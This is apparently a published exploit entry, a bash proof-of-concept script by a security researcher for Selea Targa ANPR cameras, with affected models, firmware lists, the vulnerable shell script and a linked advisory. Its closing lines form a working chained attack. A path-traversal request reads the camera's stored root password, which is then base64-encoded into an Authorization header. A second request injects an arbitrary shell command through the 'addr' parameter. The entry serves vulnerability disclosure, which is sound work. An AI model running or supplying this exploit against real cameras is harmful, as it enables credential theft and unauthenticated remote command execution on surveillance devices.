# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model: iZero
# Targa 512
# Targa 504
# Targa Semplice
# Targa 704 TKM
# Targa 805
# Targa 710 INOX
# Targa 750
# Targa 704 ILB
# Firmware: BLD201113005214
# BLD201106163745
# BLD200304170901
# BLD200304170514
# BLD200303143345
# BLD191118145435
# BLD191021180140
# BLD191021180140
# CPS: 4.013(201105)
# 3.100(200225)
# 3.005(191206)
# 3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR) also equipped with ADR system that enables it to read
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
# this camera suitable for all installation conditions. Its built-in OCR software works
# as an automatic and independent system without the need of a computer, thus giving
# autonomy to the device even in the event of an interruption in the connection between
# the camera and the operations centre.
#
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
# exploited to inject and execute arbitrary shell commands as the www-data user through
# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated
# LFI issue an attacker can grab credentials, authenticate and execute system commands.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
# 01: #!/bin/sh
# 02: . /mnt/app/scripts/env.sh
# 03: . /mnt/app/scripts/log.sh
# 04:
# 05: CMD="$1"
# 06: ADDR="$2"
# 07: PORT="$3"
# 08:
# 09: if [ "$CMD" == "ping" ]; then
# 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
# 11: elif [ "$CMD" == "port" ]; then
# 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
# 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
# 14: fi
# 15:
# 16: echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
# PHP/5.6.22
# selea_httpd
# HttpServer/0.1
# SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#
# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
IP=$1
CMD=$2
PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}
AUTH=$(echo admin:${PWD} | base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'